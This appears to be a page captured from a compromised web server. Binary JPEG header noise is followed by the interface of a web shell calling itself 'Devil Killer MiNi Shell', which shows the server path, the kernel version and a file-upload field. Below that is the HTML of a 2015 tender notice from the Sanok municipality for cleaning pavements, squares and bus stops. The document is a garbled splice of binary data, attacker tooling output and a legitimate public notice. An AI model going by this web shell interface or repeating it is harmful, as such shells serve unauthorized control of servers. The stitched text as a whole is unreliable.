JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150224/40532-N-2015.html

<p class="kh_header"><b>Sanok: Usługa związana z utrzymaniem czystości i porządku na chodnikach i placach na terenie miasta Sanoka.</b><br>
<b>Numer ogłoszenia: 40532 - 2015; data zamieszczenia: 24.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Sanoka , ul. Rynek 1, 38-500 Sanok, woj. podkarpackie, tel. 013 4652800, 4652833, faks 013 4630890.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa związana z utrzymaniem czystości i porządku na chodnikach i placach na terenie miasta Sanoka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a) rejon nr  1
    - place i chodniki:
1. plac ul. Rynek, ul. Pl.św. Jana, ul.Grodka,				            - 10040 m2
2.	chodnik przy ul. Łaziennej na odcinku od wjazdu na plac hotelu Sanvit do windy Urzędu Miasta								-   85 m2
3.	chodnik przy ul. Zamkowej po obu stronach jezdni	             		-   768 m2
4.	Pl.św. Michała wraz z chodnikami 			                        		-   2192 m2
5.	Plac Harcerski obok ul. Mickiewicza			  	     	           	-  1000 m2
6.	chodnik przy ul. Grzegorza po obu stronach jezdni  	                       		-   10304 m2
7.	plac przy ul. 3Maja, część ulicy Piłsudskiego, ul. Franciszkańska	               	- 2060 m2
8.	chodnik pomiędzy ul. 3 Maja a ul.Grzegorza (przejście pomiędzy budynkami)	- 70 m2
9.	chodnik pomiędzy  Rynkiem a ul. Franciszkańską( przejście pomiędzy 
budynkami) 									- 100 m2
10.	chodnik przy ul. Piłsudskiego po obu stronach jezdni 				- 14484 m2
11.	chodnik przy ul. Wałowa po obu stronach jezdni			      		-   380 m2
12.	chodniki przy ul. Kazimierza Wielkiego i ul. Ks. Prałata Adama Sudoła po 
obu stronach jezdni 								- 280 m2
13.	ul. Schody Zamkowe 								- 350 m2
14.	ul. schody Serpentyny 								- 168 m2
15.	ul. schody Balowskie 								- 625 m2
16.	ul. schody Franciszkańskie 						      	- 450 m2
17.	ul. Żydowska 									- 350 m2
18.	chodnik przy ul. Sobieskiego po obu stronach jezdni 				- 861 m2
19.	chodnik przy ul. Lenartowicza    po obu stronach jezdni			       	- 250 m2
20.	chodnik przy ul. Modrzewskiego po obu stronach jezdni		                  	- 150 m2
21.	chodnik przy ul. Żwirki i Wigury po obu stronach jezdni 			     	- 2400 m2
22.	chodnik przy ul. Mickiewicza po obu stronach jezdni  do skrz. z ulicą Staszica   	- 2201 m2
23.	chodnik przy ul. Kościuszki po obu stronach jezdni			     	- 2725 m2
24.	chodnik przy ul. Rymanowskiej po obu stronach jezdni do skrzyżowania 
z ul. Dąbrowicką z wyłączeniem parkingu na chodniku  po stronie Przedszkola   	- 2625 m2
25.	chodnik przy ul. Sienkiewicza po obu stronach jezdni na odcinku od 
ul. Kościuszki do skrz. z ulicą Słowackiego 					- 1227 m2
26.	chodnik przy ul. Feliksa Gieli po obu stronach jezdni				- 1126 m2
27.	chodnik przy ul. Daszyńskiego po obu stronach jezdni				- 1687 m2 
28.	chodnik przy ul. Jagiellońskiej po obu stronach jezdni 				- 3652 m2
29.	chodnik pomiędzy ul. Kolejową a ul. Ogrodową 				     	- 180 m2
30.	chodnik łączący ul. Jagiellońską z ul. Kochanowskiego pomiędzy hotelem 
a potokiem Płowieckim i sklepem Huskwarna		 			- 58 m2
31.	chodnik przy ul. Podgórze po lewej stronie jezdni na odcinku od ul. Schodów 
Franciszkańskich do ul. Schodów Zamkowych	 				- 400 m2
32.	plac przy ul. Krakowskiej (nawrót autobusowy)					- 1575	m2
33.	chodnik przy ul. Wyspiańskiego 		       				         	- 1160 m2
34.	chodnik przy ul. Świętojańskiej 						             -  460 m2
35.	chodnik przy ul. Poetyckiej 						           	-    485 m2
36.	chodnik przy ul. Łany							           	-    630 m2 
37.	chodnik przy ul. Dąbrowieckiej	         	   				        	-    420 m2
   
- przystanki komunikacyjne powierzchnia 1 przystanku 15m2 :
                                                                                                                      
ul. Kawczyńskiego - 2 przystanki			ul. Okulickiego - 6 przystanków
ul. Białogórska - 4 przystanki	                     	ul. Przemyska - 8 przystanków    
ul. Lipińskiego - 8 przystanków			ul. Beksińskiego - 1 przystanek
ul. Gorazdowskiego - 2 przystanki 			ul. 800-lecia - 4 przystanki
ul. Jana Pawła II - 3 przystanki 			ul. Biała Góra - 2 przystanki
ul. Jezierskiego - 2 przystanki 			ul. Robotnicza - 2 przystanki
ul. Krakowska - 9 przystanków 			ul. Sadowa - 6 przystanków
ul. Konarskiego - 4 przystanki 			ul. Stawiska - 1 przystanek
ul. Kościelna - 1 przystanek 			ul. Konopnickiej - 2 przystanki
ul. Stróżowska - 4 przystanki 			ul. Traugutta - 5 przystanków
ul. Warzywna - 1 przystanek 			ul. Kluski  - 1 przystanek	
ul. Rymanowska - 5 przystanków			ul. Dmowskiego - 3 przystanki
ul. Dworcowa -1 przystanek 			ul. Lwowska - 2 przystanki
ul. Mickiewicza - 4 przystanki 			ul. Podgórze - 1 przystanek
ul. Staszica - 1 przystanek 				ul. K. Bony - 3 przystanki
ul. Kościuszki - 2 przystanki			ul. Jagiellońska- 1 przystanek
ul. Okrzei - 2 przystanki				ul. Wilcza - 1 przystanek
ul. Sowia - 1 przystanek				ul. Piłsudskiego - 1 przystanek              
ul. Kiczury  - 1 przystanek				ul. Słowackiego - 1 przystanek


b)	rejon nr  2  
- place i chodniki:
 
1.	chodnik przy ul. Lipińskiego prawa strona na odcinku od przejazdu kolejowego do 
wjazdu do przychodni zdrowia	  						- 200 m2
2.	chodnik przy ul. Lipińskiego po obu stronach drogi na odcinku o  wjazdu do składu 
złomu do skrzyżowania z ul. Rzemieślniczą 					- 300 m2
3.	ulica dojazdowa i parking od ul. Błonie 			 		- 690 m2
4.	chodnik przy ul. Kochanowskiego wzdłuż  Gimnazjum nr 2			-  120 m2
5.	chodnik przy ul. Kochanowskiego i ul. Prugara Ketlingana na odcinku od skrz. 
z ul. Błonie do skrz. z ul. Lwowską od strony pawilonu	  			- 660 m2
6.	chodnik przy ul. Prugara Ketlinga od skrz. z ul. Ogrodową do bramy wjazdowej 
na posesję prywatą  								- 135 m2
7.	chodnik przy ul. Prugara Ketlinga od skrz. z ul. Zieloną do skrz. z ul. Lwowską 
od strony  budynku komunalnego 						- 230 m2
8.	chodnik wzdłuż potoku Płowieckiego 						- 1575 m2
9.	chodnik przy ul. Błonie przy przedszkolu      					-    65 m2  
10.	chodnik przy ul. Al.Wojska Polskiego   od strony budynków jednorodzinnych   	- 45 m2
11.	schody na Szklaną Górkę 							- 67 m2
12.	kładka nad torami łącząca dworzec autobusowy z dworcem kolejowym  	- 261 m2
13.	ulica dojazdowa od skrz. z ul. Daszyńskiego  koło przychodni zdrowia Nafty 	
Gaz wraz z kładką nad potokiem Płowieckim 					- 112 m2
14.	chodnik i schody pomiędzy ul. Kościuszki a ul. Daszyńskiego (koło fontanny) 	- 180 m2
15.	chodnik przy ul. Stawiska							- 1125 m2
16.	parking przy ul. Rymanowskiej (powyżej przedszkola) 				- 625 m2
17.	chodnik po jednej stronie przy ul. Białogórskiej od ronda  do końca zieleńca      	- 2000 m2
18.	parking i droga dojazdowa do budynków przy ul. Langiewicza 9-7oraz chodnik 
pomiędzy budynkiem Traugutta 17 a 11   		     			- 2418 m2
19.	łącznik pomiędzy ul. Traugutta a ul. Poprzeczną droga bez parkingu                   	- 275 m2
20.	łącznik pomiędzy ul. Poprzeczną a ul. Mickiewicza wzdłuż zieleńca         	- 286 m2
21.	chodnik przy ul. Kwiatowej obok Sanoczanki                                 		- 130 m2
22.	chodnik przy ul. Krasińskiego obok Sanoczanki                                     	- 130 m2
23.	chodnik od ul. Gorazdowskiego do kościoła (biegnący przez zieleniec)            	- 100 m2
24.	chodniki pomiędzy ul. Jana Pawła II a Szkołą podstawową nr 4                         	- 400 m2
25.	ulica przed  blokiem Cegielniana 34  bez parkingu                                    	- 600 m2
26.	chodni przy ul. Jana Pawła II od strony kościoła na odcinku od SPGK do 
ul. Gorazdowskiego, przy ogródku Jordanowskim oraz przy parkingu obok  
Ośrodka Zdrowia 			         					- 518 m2
27.	chodnik przy ul. Langiewicza przy ogródku Jordanowskim                           	- 450 m2
28.	chodnik przy ul. Traugutta przy ogródku Jordanowskim                                       	- 200 m2
29.	chodnik przy ul. Sadowej po obu stronach jezdni                                             	- 2600 m2
30.	chodnik przy ul. Kiczury przy Cmentarzu Centralnym                           		- 100 m2
31.	chodnik przy ul. Cegielnianej na odcinku od skrzyżowania z ul. Jana Pawła II 
do sklepu PSS						 			- 220 m2
32.	chodnik przy ul. Traugutta na odcinku od ul. Żwirki i Wigury do skrz. 
z obwodnicą od strony stadionu        						- 100 m2
33.	chodnik przy ul. Wyspiańskiego 	           					- 1160 m2
34.	chodnik przy ul. Świętojańskiej 						-  460 m2
35.	chodnik przy ul. Poetyckiej 							- 485 m2
36.	chodnik przy ul. Łany								- 630 m2 
37.	chodnik przy ul. Dąbrowieckiej							- 420 m2
	         

4)	Powierzchnie  podano orientacyjnie.

5)	Oczyszczaniu chodników i placów na całej szerokości obejmujące usuwanie wystających roślin, codzienne zbieranie śmieci, błota, zamiatanie piasku, liści oraz usuwanie  innych odpadów w godzinach od 4 00  do 16 00. W przypadku wystąpienia opadów śniegu - zgarnianie śniegu, usuwanie śliskości poprzez posypywanie mieszanką piaskowo-solną  do godz. 8 00 .  W przypadku wystąpienia opadów śniegu   po godz. 8 00 należy niezwłocznie przystąpić do  zgarniania śniegu, usuwania śliskości poprzez  posypywanie mieszanką piaskowo-solną oraz usuwania lodu i błota pośniegowego. Do usuwania śliskości należy używać mieszanki piaskowo- solnej         o zawartości soli 30%. Mieszankę piaskowo- solną dostarcza Wykonawca.
          Mieszankę piaskowo-solną należy  usunąć  terminie 7 dni od dnia zakończenia akcji
          zimowej. W przypadku sprzyjających warunków atmosferycznych mieszankę piaskowo
          - solną należy  usuwać na zlecenie Zamawiającego. 
          Zebrane odpady z chodników i placów  zagospodarowuje Wykonawca zgodnie
           z ustawą  o utrzymaniu czystości i porządku w gminach i ustawą o odpadach. Koszty
           zagospodarowania odpadów ponosi Wykonawca..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.61.10.00-3, 90.61.20.00-0, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 13000.00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)  Należy przedłożyć oświadczenie o posiadaniu uprawnień w zakresie wykazania   spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy.     Zał. nr 2
b)  Należy przedłożyć zezwolenie na  transport odpadów innych niż niebezpieczne wydane przez właściwy organ zgodnie z ustawą  o odpadach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Należy przedłożyć wykaz co najmniej jednej usługi związanej z utrzymaniem czystości   i porządku chodnikach lub placach  o wartości  min 600. 000,00 zł, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,   z załączeniem dowodów czy usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Należy wykazać   min.8 ciągników, które będą wykonywać zamówienie przystosowane do odśnieżania i zwalczania śliskości na chodnikach o szerokości       do 1m, do 2m, do 3m i więcej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)  Należy przedłożyć wykaz osób  min.16 osób, które będą wykonywać zamówienie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Należy przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą  niż - 600.000,00 zł,  wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  albo składania wniosków  o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, 
b) Należy przedłożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej                 w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę          co najmniej   600 000,00 zł.                                                                                    
c) Należy przedłożyć aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
d) Należy przedłożyć aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie      w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału        w postępowaniu o udzielenie zamówienia albo składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
